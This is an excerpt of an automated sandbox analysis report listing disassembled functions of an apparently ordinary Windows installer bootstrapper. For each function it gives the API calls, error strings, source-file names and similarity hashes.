GetLastError.KERNEL32(?,?,000E6B11,00000000,?,?,?,?,?,?,?,?,?,000E6F28,?,?), ref: 0010592B

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,000E6B11,00000000,?), ref: 00105965
GetLastError.KERNEL32(?,?,000E6B11,00000000,?,?,?,?,?,?,?,?,?,000E6F28,?,?), ref: 0010596F

Strings

svcutil.cpp, xrefs: 0010594E, 00105990

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: 88129814467799b9bed1e83e467ef4733bbc9434356eb0a5509af116d2a8f8ef
Instruction ID: 6791f7e4002892fd72fc8a4cff931d245c4f9b19f305a2571a93dec883cc59bf
Opcode Fuzzy Hash: 88129814467799b9bed1e83e467ef4733bbc9434356eb0a5509af116d2a8f8ef
Instruction Fuzzy Hash: DF212632941639F7E7215A918D04FAF7E6E9B40B74F124014BC84AB280E7A18D009AE0

Function 000C9839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 000C98C8

Strings

Failed to find variable., xrefs: 000C98B5
Failed to parse condition '%ls' at position: %u, xrefs: 000C987A
Failed to read next symbol., xrefs: 000C98E4
condition.cpp, xrefs: 000C986A, 000C98AB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: acef2215b6a3f678041d69d93715abefdf8a43aca1564da4a8f07ec12e77bf12
Instruction ID: a2f0c568d2e5f888632cad4f6f6547df31c1a82576d23602b59382b65a70ee37
Opcode Fuzzy Hash: acef2215b6a3f678041d69d93715abefdf8a43aca1564da4a8f07ec12e77bf12
Instruction Fuzzy Hash: 6811C43319022076DB252BAC9C8AF9E3A54EF16720F044059F9406B1D2CFA2C91497E1

Function 000C9E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9E38

Strings

File search: %ls, did not find path: %ls, xrefs: 000C9EA3
Failed to format path string., xrefs: 000C9E43
Failed to set variable., xrefs: 000C9E97
Failed get file version., xrefs: 000C9E78

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: bfb63fe426f948262a5335fa4ab15ac9f7a6f7608af2b2f808b5a26fda36b64a
Instruction ID: c983c992f750829c9ba3945323463708dca93db3ef9bb2ff6258ffc40fd65e51
Opcode Fuzzy Hash: bfb63fe426f948262a5335fa4ab15ac9f7a6f7608af2b2f808b5a26fda36b64a
Instruction Fuzzy Hash: 37119072D40128BBCB12AFD48C86EEEFB78EF24750F11816AF90066251D7725E109BD1

Function 000D820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,000D8E17,0000001A,00000000,?,00000000,00000000), ref: 000D8258
GetLastError.KERNEL32(?,?,000D8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 000D8262

Strings

Failed to create well known SID., xrefs: 000D8290
Failed to allocate memory for well known SID., xrefs: 000D8240
cache.cpp, xrefs: 000D8236, 000D8286

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: d34d62f7e13ebf50b866b68f1c51072c4e372ad6356bf381257cc62bd024efe6
Instruction ID: c05357a42929bc3b14274af296530a05c106dd9aceac6f2281ac2063001b949c
Opcode Fuzzy Hash: d34d62f7e13ebf50b866b68f1c51072c4e372ad6356bf381257cc62bd024efe6
Instruction Fuzzy Hash: 5101C232656725A7D63166994C06EAF6BA8CF41B60F11802BFD00AB381EFB58D4086F0

Function 000EDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 000EDDCE
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EDDF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000EDFC8,00000000,?,?,?,?,00000000), ref: 000EDE00

Strings

Failed while waiting for download., xrefs: 000EDE2E
bitsengine.cpp, xrefs: 000EDE24

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsengine.cpp
API String ID: 435350009-228655868
Opcode ID: 20efe33d838d24fced960a984db2f1bccd09cc2bf827b51588183483d608c61a
Instruction ID: f28a4d2ea337c2161bd5547b5b26748e3609532f9743cce9edb697ab94d55063
Opcode Fuzzy Hash: 20efe33d838d24fced960a984db2f1bccd09cc2bf827b51588183483d608c61a
Instruction Fuzzy Hash: 4E112973A452757BD7205AAA9C4DEEFBBACEB08720F100127FE05FB281D6A19D0081E0

Function 00103C72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00103CC0
GetLastError.KERNEL32(?,?,00000000), ref: 00103CCA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00103CFD

Strings

<, xrefs: 00103CB2
shelutil.cpp, xrefs: 00103CEB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$shelutil.cpp
API String ID: 3023784893-3991740012
Opcode ID: cb625901dc1dbd8d62199397c250a2ecfb8534bfe3ea091a055f109f29def012
Instruction ID: 00794c2171f071a9e2bc839e40fd97463926aa09073c113526a03d5308ac4894
Opcode Fuzzy Hash: cb625901dc1dbd8d62199397c250a2ecfb8534bfe3ea091a055f109f29def012
Instruction Fuzzy Hash: 6611D875E01229ABDB10DFA9D945ACEBBF8AB08750F104116FD55F7340E7709A10CBA4

Function 000C5F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 000C5F5C
GetLastError.KERNEL32 ref: 000C5F66

Strings

Failed to get computer name., xrefs: 000C5F94
variable.cpp, xrefs: 000C5F8A
Failed to set variant value., xrefs: 000C5FAD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: fe93e10ee2e24669a6ff519ebc590a8b9381788b7efe0516aebc5c3b7cb93af6
Instruction ID: 9bb044b0407b89abe28b97fe47e7b192a703460b50ade17a491231aa2b71fccb
Opcode Fuzzy Hash: fe93e10ee2e24669a6ff519ebc590a8b9381788b7efe0516aebc5c3b7cb93af6
Instruction Fuzzy Hash: BE112933A455286BC7249B94DC01FDFB7E8AB08710F014029FD40FB280DBB1AE8486E1

Function 000C9A4D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 000C9AC4

Strings

Failed to select condition node., xrefs: 000C9A7B
Condition, xrefs: 000C9A5F
Failed to get Condition inner text., xrefs: 000C9A94
Failed to copy condition string from BSTR, xrefs: 000C9AAE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString
String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
API String ID: 3341692771-3600577998
Opcode ID: 0a8d4d43422e8c99ca46926f586f265f8cffe4de587a7a65d7b651fe2ea15d78
Instruction ID: 6c263ea3cb88208b6ea5721591cfe1eae578fa71832be57b2232defc05f2e57b
Opcode Fuzzy Hash: 0a8d4d43422e8c99ca46926f586f265f8cffe4de587a7a65d7b651fe2ea15d78
Instruction Fuzzy Hash: 4A11C432901228BBDB26AB94DD0AFADBBA8EF00711F11415CFC40BA190CBF19E40D6C1

Function 000C5E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 000C5EA6

Part of subcall function 00100ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,000C5EB2,00000000), ref: 00100AE0
Part of subcall function 00100ACC: GetProcAddress.KERNEL32(00000000), ref: 00100AE7
Part of subcall function 00100ACC: GetLastError.KERNEL32(?,?,?,000C5EB2,00000000), ref: 00100AFE

Part of subcall function 00103D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00103D4C

Strings

Failed to get shell folder., xrefs: 000C5EDA
Failed to get 64-bit folder., xrefs: 000C5EF0
variable.cpp, xrefs: 000C5ED0
Failed to set variant value., xrefs: 000C5F0A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: 47b3cdb56555ad1c1a9d9f02ef04676c66f46671b3506f44c0e5d8c97086fd43
Instruction ID: d335e044eda9efac61114087361409c0bb938902eb2fd66f7eefdcf38b2a4f43
Opcode Fuzzy Hash: 47b3cdb56555ad1c1a9d9f02ef04676c66f46671b3506f44c0e5d8c97086fd43
Instruction Fuzzy Hash: 4701DB32905A18BBDF26A7D0DC06FEE7A68EF00721F104169F840B61C1DBF1AE809BD1

Function 00104153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00104440: FindFirstFileW.KERNEL32(000E923A,?,00000100,00000000,00000000), ref: 0010447B
Part of subcall function 00104440: FindClose.KERNEL32(00000000), ref: 00104487

SetFileAttributesW.KERNEL32(000E923A,00000080,00000000,000E923A,000000FF,00000000,?,?,000E923A), ref: 00104182
GetLastError.KERNEL32(?,?,000E923A), ref: 0010418C
DeleteFileW.KERNEL32(000E923A,00000000,000E923A,000000FF,00000000,?,?,000E923A), ref: 001041AC
GetLastError.KERNEL32(?,?,000E923A), ref: 001041B6

Strings

fileutil.cpp, xrefs: 001041D1

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 607e3c8bf873d37b23b5100b463212520dcdc73810c8b28db22ba0f368bcb6b5
Instruction ID: 1b9988096e5a04555c553e775fae1bf3bc99b2e6e28988ed22590497d2e5f828
Opcode Fuzzy Hash: 607e3c8bf873d37b23b5100b463212520dcdc73810c8b28db22ba0f368bcb6b5
Instruction Fuzzy Hash: 8C01F5F2A41636ABD7316AA59C84B5B7EA8AF24760F010210FEC4EA6D0D7B1AD9085D0

Function 000EDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000EDA1A
LeaveCriticalSection.KERNEL32(?), ref: 000EDA5F
SetEvent.KERNEL32(?,?,?,?), ref: 000EDA73

Strings

Failed to get state during job modification., xrefs: 000EDA33
Failure while sending progress during BITS job modification., xrefs: 000EDA4E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: 879a53a60c95dd6e9f36fb9b82bef5d58a865c0957346cd644c739a794ac457f
Instruction ID: 863365403dd0ecced0cde0ca9184421b4cdcc91f1a09fbc2172be87cbada9aaf
Opcode Fuzzy Hash: 879a53a60c95dd6e9f36fb9b82bef5d58a865c0957346cd644c739a794ac457f
Instruction Fuzzy Hash: E501D272605668FFCB12DB56E848AAEB7A8FF18321B008216E805E3600D771AA54C7D1

Function 000EDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,000EDDEE), ref: 000EDC92
LeaveCriticalSection.KERNEL32(00000008,?,000EDDEE), ref: 000EDCD7
SetEvent.KERNEL32(?,?,000EDDEE), ref: 000EDCEB

Strings

Failed to get BITS job state., xrefs: 000EDCAB
Failure while sending progress., xrefs: 000EDCC6

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: 7acdb1825d3eae8fa0e1a1dc5358f223aeccf7f4b622bebcf10b5c6cdde3c6ec
Instruction ID: 69f06adfa5e869921074b5279d2a92c01a19c8950cfc5e6f9491bea179e88f3a
Opcode Fuzzy Hash: 7acdb1825d3eae8fa0e1a1dc5358f223aeccf7f4b622bebcf10b5c6cdde3c6ec
Instruction Fuzzy Hash: 46012872A01726FFC7129B46EC4999EB7ACFF08360B104256F904A3640DBB1ED50C7D0

Function 000ED7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,000EDF52,?,?,?,?,?,?,00000000,00000000), ref: 000ED802
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,000EDF52,?,?,?,?,?,?,00000000,00000000), ref: 000ED80D
GetLastError.KERNEL32(?,000EDF52,?,?,?,?,?,?,00000000,00000000), ref: 000ED81A

Strings

Failed to create BITS job complete event., xrefs: 000ED848
bitsengine.cpp, xrefs: 000ED83E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsengine.cpp
API String ID: 3069647169-3441864216
Opcode ID: 3b23c916e11f180c28fa82ee17c851cdd60a7be876a66d305982d4f68bdbd532
Instruction ID: 2e4ba311084a14399dfa1eedd934c7d30491c70eec8bb339f320b3d080bd4a4f
Opcode Fuzzy Hash: 3b23c916e11f180c28fa82ee17c851cdd60a7be876a66d305982d4f68bdbd532
Instruction Fuzzy Hash: A101B576901632AFC3119F56D905A8BBFA8FF09B20B004116FD48E7741EBB0D810CBE4

Function 000CD4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,000D7040,000000B8,00000000,?,00000000,7707B390), ref: 000CD4B7
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 000CD4C6
LeaveCriticalSection.KERNEL32(000000D0,?,000D7040,000000B8,00000000,?,00000000,7707B390), ref: 000CD4DB

Strings

Engine active cannot be changed because it was already in that state., xrefs: 000CD4FE
userexperience.cpp, xrefs: 000CD4F4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 0225c8bb44bd3873475ee02f59c9133ec1f2c889eed8618e80ab2d1cb4f4e39d
Instruction ID: 6b8924adf95453d1323799ec84d0086a0ced1e1ca2708c45699aeffac0e4fc1d
Opcode Fuzzy Hash: 0225c8bb44bd3873475ee02f59c9133ec1f2c889eed8618e80ab2d1cb4f4e39d
Instruction Fuzzy Hash: 7BF08C72204308ABD7219BA6AC85E9B73ACFB99761300442EB641C3680DBB1E9458660

Function 00101C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00101CB3
GetLastError.KERNEL32(?,000C49DA,00000001,?,?,000C4551,?,?,?,?,000C5466,?,?,?,?), ref: 00101CC2

Strings

srclient.dll, xrefs: 00101C91
SRSetRestorePointW, xrefs: 00101CA8
srputil.cpp, xrefs: 00101CE3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: 6680461410b8f240a5c2db9e5f75ecce025465a1d02d74e5653745a1d0386cfd
Instruction ID: 3ceaef1832feddf6f89e2cb029eda3f2fb703932e499931c55707b14eb9c5355
Opcode Fuzzy Hash: 6680461410b8f240a5c2db9e5f75ecce025465a1d02d74e5653745a1d0386cfd
Instruction Fuzzy Hash: 50012637A8423277D33213E56C09B5A36405B007A1F010026BD80AB6D0D7ECDC90C6D4

Function 000F495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000F490E,00000000,?,000F48AE,00000000,00127F08,0000000C,000F4A05,00000000,00000002), ref: 000F497D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F4990
FreeLibrary.KERNEL32(00000000,?,?,?,000F490E,00000000,?,000F48AE,00000000,00127F08,0000000C,000F4A05,00000000,00000002), ref: 000F49B3

Strings

CorExitProcess, xrefs: 000F4988
mscoree.dll, xrefs: 000F4976

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a678c3696ea940b7d46d2eba76c4247818a1fd516ad83b5f848946623646fc99
Instruction ID: 408b91544a2c81c5bef9198daec768003977f1855b03f958e36ed91aaeaa130c
Opcode Fuzzy Hash: a678c3696ea940b7d46d2eba76c4247818a1fd516ad83b5f848946623646fc99
Instruction Fuzzy Hash: 26F04F30A0421CBBCB11AF90EC59BAEBFB8EF04715F004069FD05A2550CBB54A90DA95

Function 000D9287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000D93C9

Part of subcall function 001056CF: GetLastError.KERNEL32(?,?,000D933A,?,00000003,00000000,?), ref: 001056EE

Strings

Failed to get certificate public key identifier., xrefs: 000D93F7
cache.cpp, xrefs: 000D93ED
Failed to read certificate thumbprint., xrefs: 000D93BD
Failed to find expected public key in certificate chain., xrefs: 000D938A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 1452528299-3408201827
